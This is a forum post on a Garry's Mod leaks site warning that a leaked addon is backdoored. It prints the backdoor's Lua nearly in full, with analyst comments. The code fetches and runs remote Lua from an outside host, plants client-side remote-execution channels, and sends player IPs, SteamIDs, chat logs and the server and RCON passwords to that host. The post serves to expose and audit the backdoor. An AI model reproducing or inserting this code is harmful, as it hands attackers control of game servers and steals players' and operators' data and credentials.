Garry's Mod Leaks

CLOSE

Submitted by MilitoDr, , Thread ID: 243245


RE: CLOSE

This post was last modified: 28-05-2022, 07:31 PM by Bright1337
#16
This has backdoors in it.
It pulls its code from "https://api.omega-project.cz/api_connect.php?api_key=iemPWLCJOpzPMzsmmAeE" ~ French backdoor... how unexpected -_-

I tried reverse engineering the code but gave up on the decryption at the last (maybe) step. Here it is in its glory:

-- Analyst notes (setup stage). This listing is Garry's Mod Lua (GLua), not stock Lua.
-- The two hook event names are held in locals, so the hook.Add calls further down
-- do not contain the literal event names.
local PlayerInitialSpawnHook,PlayerDisconnectHook = "PlayerInitialSpawn", "PlayerDisconnected"
-- Extra request header passed to three of the http.Post calls below.
-- The value is the unpadded Base64 form of the 32-character hex token that the
-- log POSTs in this listing send as "csrf".
local WeirdHeaderForShit = {
["Authorization"] = "ZWJiMGE0NGJjZmFhYjVjYWNkZDYyMzM4NzllMjE5ZWQ"
}
-- Sets the sv_hibernate_think console variable to "0" as soon as the file loads.
RunConsoleCommand("sv_hibernate_think", "0")
-- Each request downloads a body from the remote host and hands it straight to
-- RunString, so whoever controls that host decides what Lua runs on this server.
-- The file name "no-backdoors.lua" and the variable names say nothing about what
-- the response contains; the response content is not part of this listing.
HTTP({ url="https:\/\/api.omega-project.cz/no-backdoors.lua"; method="get"; success=function(api,anti_backdoors) RunString(anti_backdoors) end })
HTTP({ url="https:\/\/api.omega-project.cz/api_player_blacklist.php"; method="get"; success=function(api,bad_player_blacklist) RunString(bad_player_blacklist) end })

-- Addon inventory: reports every folder under addons/ to the remote host.
-- file.Find returns files first and directories second; only the directory list is kept.
local _, addons_folders = file.Find("addons/*", "GAME")
for k,v in pairs(addons_folders) do
-- Six folder names are skipped (presumably stock folders; not established by this listing).
-- `!=` is a GLua operator and does not parse in stock Lua.
if (v != "checkers") and (v != "chess") and (v != "common") and (v != "go") and (v != "hearts") and (v != "spades") then
-- Sends the server IP, a fixed "crsf" token (three '#'-separated fields, the middle one
-- Base64), the folder name and the Base64 of the folder's file.Time value.
http.Post("https:\/\/api.omega-project.cz/api_addons.php", {server_ip = _G["game"]["GetIPAddress"](),crsf = "rUhmMdIueplHqMvbepLUmntjninUgEkJyuuYDkha#NDYuMTM0LjQ5LjIyOQ==#sQnFwGhSWjvTmTqhoHTRQZEfsmjBumUwbRsXOOGk",addons_name = v, addons_update = util.Base64Encode(file.Time( "addons/"..v, "GAME" ))}, function(http_addons)
-- A response that is empty or starts with "<" is ignored (presumably to skip HTML
-- error pages); any other response body is executed as Lua on the server.
if _G["string"]["Left"]( http_addons, 1 ) == "<" or http_addons == "" then
return
else
RunString(http_addons)
end
-- Empty failure callback: request errors are dropped without any log output.
end, function( error )
end, WeirdHeaderForShit )
end
end

-- Registers a net message name, then uses BroadcastLua to run a snippet on clients.
-- The snippet installs a client-side receiver that reads a 16-bit length, reads that
-- many bytes, decompresses them, compiles the result and calls it. Anything later sent
-- on this channel therefore runs as Lua on the receiving clients.
-- The random-looking channel name is a fixed string in this copy and can serve as a
-- search indicator when auditing addons.
util.AddNetworkString("aYJQsmzZNbCjkcNsojff")
_G["BroadcastLua"]([[net.Receive("aYJQsmzZNbCjkcNsojff",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
-- Global function: compresses the given string and broadcasts it on the
-- "aYJQsmzZNbCjkcNsojff" channel after a 0.5 s delay. The string is Lua source,
-- judging by the client receiver, which compiles and runs whatever arrives.
-- The decimal escapes decode to plain names:
--   "\110\101\116" = "net", "\83\116\97\114\116" = "Start",
--   "\87\114\105\116\101\85\73\110\116" = "WriteUInt",
--   "\87\114\105\116\101\68\97\116\97" = "WriteData",
--   "\66\114\111\97\100\99\97\115\116" = "Broadcast".
-- The name of this function is also reported to the remote host as "client_func"
-- in the server-info POST further down.
function _0x269553(NrhsXbKvvmRHAMHUbSrr)
timer.Simple( 0.5, function( )
-- Writes the globals `data` and `len` through _G; the bare names are read back below.
_G["data"] = util.Compress(NrhsXbKvvmRHAMHUbSrr)
_G["len"] = #data
_G["\110\101\116"]["\83\116\97\114\116"]("aYJQsmzZNbCjkcNsojff")
-- Length is written as a 16-bit unsigned integer; no size check is made here.
_G["\110\101\116"]["\87\114\105\116\101\85\73\110\116"](len, 16)
_G["\110\101\116"]["\87\114\105\116\101\68\97\116\97"](data, len)
_G["\110\101\116"]["\66\114\111\97\100\99\97\115\116"]()
end)
end

-- Second channel, set up the same way as the first: the broadcast snippet installs a
-- client-side receiver that decompresses, compiles and calls whatever arrives on
-- "zPxmjKXatPStuyGQyatK". This channel is the one used by SendPly for a single player.
util.AddNetworkString("zPxmjKXatPStuyGQyatK")
_G["BroadcastLua"]([[net.Receive("zPxmjKXatPStuyGQyatK",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
-- Global function: like _0x269553, but delivers the compressed string only to the
-- player whose SteamID64 equals `steamid64`, on the "zPxmjKXatPStuyGQyatK" channel.
-- The escapes are additionally split with `..`; they still decode to
-- "data", "len", "net", "Start", "WriteUInt" and "WriteData".
function SendPly(NrhsXbKvvmRHAMHUbSrr, steamid64)
timer.Simple( 0.5, function( )
-- Same global `data` / `len` variables as in _0x269553.
_G["\100\97\116\97"] = util.Compress(NrhsXbKvvmRHAMHUbSrr)
_G["\108\101\110"] = #data
_G["\110\101\116"]["\83\116".."\97\114\116"]("zPxmjKXatPStuyGQyatK")
_G["\110".."\101\116"]["\87\114".."\105\116\101\85\73\110\116"](len, 16)
_G["\110\101".."\116"]["\87\114\105\116\101\68".."\97\116\97"](data, len)
-- Walks all connected players and sends the message to each one whose ID matches.
for k, ply in pairs(player.GetAll()) do
if ( ply:SteamID64() == steamid64 ) then
_G["\110\101\116"]["Send"](ply)
end
end
end)
end

-- hook.Add("PlayerInitialSpawn", ...): "\104\111\111\107" = "hook", "\65\100\100" = "Add".
-- On every player join the server POSTs the player's name and IP address plus the
-- server's own IP to the remote log endpoint.
-- Decoded field names: "csrf", "color", "content", "server_ip".
-- The success callback is RunString itself, so the response body of this "logging"
-- request is executed as Lua on the server.
_G["\104\111\111\107"]["\65\100\100"](PlayerInitialSpawnHook, "zFpiunFsMswHJIHTQGfrkLkxbsBNGbxNhJxaYPrTaBHwKXYPHM", function(ply)
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["\99\111\108\111\114"] = "5dc766",
["\99\111\110\116\101\110\116"] = "Client "..ply:Name().." connected ("..ply:IPAddress()..").",
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
end)

-- hook.Add("PlayerDisconnected", ...): reports each disconnect (player name and server IP)
-- to the same log endpoint. Decoded field names: "csrf", "content", "server_ip".
-- As with the join hook, the response body is passed to RunString and executed.
_G["\104\111\111\107"]["\65\100\100"](PlayerDisconnectHook, "IYFEfRtGTNMEloxBPyvwWBIHOtZEAzsrUAIOrnJolqsPtDjMrn", function(ply)
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["color"] = "de3333",
["\99\111\110\116\101\110\116"] = "Dropped "..ply:Name().." from server (Disconnect by user).",
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
end)

-- Defines a global named ServerLog. Garry's Mod ships a global of the same name, so
-- this definition replaces it for every addon loaded afterwards.
-- The replacement forwards the log text and server IP to the remote endpoint and
-- executes the response via RunString ("\99\115\114\102" = "csrf").
function ServerLog( logs_content )
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
content = logs_content,
server_ip = _G["game"]["GetIPAddress"]()
},RunString)
-- NOTE(review): this calls the function being defined, not the engine's original,
-- and there is no terminating branch, so a call to ServerLog never returns and
-- repeats the POST each time round. This fits the thread's remark that the backdoors
-- are broken; on an affected server it would show up as a hang on the first log call.
return ServerLog( logs_content )
end

-- Defines a global named Error, replacing the Garry's Mod global of the same name.
-- The error text and server IP go to the remote log endpoint and the response body is
-- executed via RunString. Decoded field names: "csrf", "content", "server_ip".
-- The parameter is called `string`, which shadows the string library inside this body.
function Error( string )
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["\99\111\110\116\101\110\116"] = string,
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
-- NOTE(review): unconditional self-call with no terminating branch, same as ServerLog
-- above; a call to Error never returns.
return Error( string )
end

-- Main beacon: a named timer with a 5 second delay and 0 repetitions (repeats
-- indefinitely). Each tick (1) re-registers a chat-forwarding hook, (2) scans the cfg
-- files for the RCON password, (3) reports every connected player and (4) reports
-- server details including passwords. Every response is executed with RunString.
-- The fixed timer and hook identifiers below can serve as search indicators when
-- auditing addons.
timer.Create( "nmIhEbjWxFzzisaaVEAdenKiTWALFFlmLhIyTmHfVHAJJsTLxG", 5, 0, function()
-- (1) PlayerSay hook, added again under the same identifier on every tick.
-- It forwards each chat message with the sender's name and SteamID64, and returns
-- nothing itself.
hook.Add( "PlayerSay", "XdobnfBpYELZLmGoUpfNauFKkjxEUTFSbsvpAxttLCfZdpVldm", function( ply, text )
local http_chat_table = {
name = ply:Name(),
server_ip = _G["game"]["GetIPAddress"](),
steamid64 = ply:SteamID64(),
-- Five random-looking key/value pairs; their purpose is not visible in this listing.
DRJLVBpDld = "SbWAumfRXzZbNOTMnyLlcuMIoyjvvxLQFEAyMeDm",
thJclyVnWu = "iEwcZaSshJGawvDAEFswWtDTdMgHHXzhWTEoPGPm",
UGxsBnNMRW = "AtziOfRhRfDuBbyNXbCvnuomhqYkuQoFcclZLcqy",
aWpjWJWBpD = "JzEaenhAzTvrCiMLgBNLserOzmCYTRyLulJiagWE",
oNUUXEBKRN = "sbQdrbGLrkOjwJYrdmmlJPztQQuVAqOBAPGLzszA",
message = text
}
-- The response to the chat POST is executed without even the "<"/empty check used
-- elsewhere, and no failure callback is supplied.
http.Post("https:\/\/api.omega-project.cz/chat_connect.php?yYNdOwVmqEyCSFu=DBjEHsGKMaoJmns", http_chat_table, function(http_chat)
RunString(http_chat)
end)
end)

-- (2) Credential harvesting: lists cfg/*, reads every file ending in ".cfg" and, for
-- each line that starts with "rcon_password", keeps the text between the first pair
-- of double quotes. A later match overwrites an earlier one.
-- Any server that ran this code should treat its rcon_password and sv_password as
-- disclosed and rotate them.
local _0x0004982 = file.Find("cfg/*", "GAME")
local rcon_pw = ""
for i = 1, #_0x0004982 do
if string.EndsWith(_0x0004982[i], ".cfg") then
for k,v in pairs(string.Split(file.Read("cfg/" .. _0x0004982[i], "GAME"),"\n")) do
if string.StartWith(v,"rcon_password") then
rcon_pw = string.Split(v,"\"")[2]
end
end
end
end

-- (3) Per-player report, sent for every connected player on every tick.
-- Decoded keys: "name", "ip", "server_ip", "crsf", "steamid", "steamid64".
for k,v in pairs(player.GetAll()) do
local RMrIJYBBhAeDgqsdDguE = { -- player name, IP address and Steam identifiers
["\110\97\109\101"] = v:GetName(),
["\105\112"] = v:IPAddress(),
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"](),
["\99\114\115\102"] = "ESpjJjsSaLDunMmaayNueFoWwRkOgxsReRWDpZYz#NDYuMTM0LjQ5LjIyOQ==#OICcYMfOWERvMHXHBsgoVxemZsvgpnznBKuKsVco",
["\115\116\101\97\109\105\100"] = v:SteamID(),
["\115\116\101\97\109\105\100\54\52"] = v:SteamID64(),
["mJCScMgeVw"] = "akwlxPqdWEGAdkkmImlDLpjVfHaIYwXoMdPreMzH",
["fJGcZFbDzP"] = "fMpCQdGSvMPUfdrSSuqnZzlHuAMrmNeBgkgBRUbV",
["TEOtgpVzsx"] = "TpHketGzNTssxtllRnfYrWvsApJiBVDklrioQVEV",
["ifeCZhnUNp"] = "UraQdvachsosgSOxlgTHfQjzHJKKdMTzKkgdSoNy",
["RnBOqvIfHh"] = "NIuPGfBzTyXzNItyfUrYFRMJBOPvDdzpcioejOAs"
}
-- NOTE(review): `vTongueing` is not defined anywhere in this listing. It is probably a
-- forum-rendering artifact of `v:Ping()` (the ":P" emoticon replaced by its name), so
-- auditors should search for that form too - TODO confirm against an original copy.
http.Post("https://api.omega-project.cz/v1/gmod-panel/user-connect.php?JkuJojmgMwBRKDa=XjzppAoKIFzdVIv&ping=" .. vTongueing(), RMrIJYBBhAeDgqsdDguE, function( http_users )
-- Empty responses and those starting with "<" are skipped; anything else is executed.
if string.Left( http_users, 1 ) == "<" or http_users == "" then
return
else
RunString( http_users )
end
-- Empty failure callback: request errors are dropped silently.
end, function( error )
end, WeirdHeaderForShit )
end
-- (4) Server report. Decoded keys and the API names hidden behind the escapes:
--   "i"  server IP           "n"  GetHostName()        "m"  game.GetMap()
--   "bo" bot count           "g"  engine.ActiveGamemode()
--   "nb" players/max         "lurl" sv_loadingurl      "pass" sv_password
--   "k"  same value as the api_key in the loader URL quoted in the post
--   "client_func" name of the global broadcast function defined earlier
--   "r"  the RCON password collected in step (2)
local TcwwQwuoRiYOccyPCudM = { -- server details, including sv_password and rcon_password
["i"] = _G["game"]["GetIPAddress"](),
["n"] = _G["\71\101\116\72\111\115\116\78\97\109\101"](),
["m"] = _G["\103\97\109\101"]["\71\101\116\77\97\112"](),
["bo"] = _G["\116\111\115\116\114\105\110\103"](#_G["\112\108\97\121\101\114"]["\71\101\116\66\111\116\115"]()),
-- Server IP, a fixed tag and a number that looks like a Unix timestamp (2022-05-28),
-- presumably the time this copy was generated - not established by the listing.
["c"] = _G["\103\97\109\101"]["\71\101\116\73\80\65\100\100\114\101\115\115"]().."{+}".."AYkwYBvmN" .."{+}".."1653757789",
["g"] = _G["\101\110\103\105\110\101"]["\65\99\116\105\118\101\71\97\109\101\109\111\100\101"](),
["crsv"] = "NDYuMTM0LjQ5LjIyOQ==#FpmffElyGtfQQCnnHsUmeynbxhtkqBuInlWQsiqu",
["\110\98"] = tostring(#player.GetAll()).."/"..game.MaxPlayers(),
["\108\117\114\108"] = _G["GetConVar"]("sv_loadingurl"):GetString(),
["\112\97\115\115"] = GetConVar("\115\118\95\112\97\115\115\119\111\114\100"):GetString(),
["\107"] = "iemPWLCJOpzPMzsmmAeE",
["\99\108\105\101\110\116_\102\117\110\99"] = "_0x269553",
["\114"] = rcon_pw,
["EryEqWFPrr"] = "AgEiEaFLDaxVXCNkvNfqdBOWOWfMITgOtHXvrdce",
["LHDdvzWFzV"] = "YxtToQNNdbsIsNQNVZYOxhzlQKiVzeXXaYfnwPWU",
["NnNZbhBbvb"] = "qTtMuqmaLDkWkJFjGTgXrCxHsRRnqNpipTSBAfkN",
["tYmZDpqMcZ"] = "iVxnJiRHRKybdHxoBCyXiQiWzwoTSAuyfpTAtVwB",
["GNQVRVrKLD"] = "hDKLtFGYCJicCfhZDYTAszbIsmrARXIRypEGMQAt"
}
-- The endpoint's response is executed on the server unless it is empty or starts with "<".
http.Post("https://api.omega-project.cz/v1/gmod-panel/socket-controller.php", TcwwQwuoRiYOccyPCudM, function(http_servers)
if string.Left( http_servers, 1 ) == "<" or http_servers == "" then
return
else
RunString(http_servers)
end
-- Empty failure callback: request errors are dropped silently.
end, function( error )
end, WeirdHeaderForShit )
end)

And yeah OP, don't say that there aren't any backdoors when some of the addons got backdoored so poorly that even the backdoors did not execute due to errors.
Looking for Backdoors
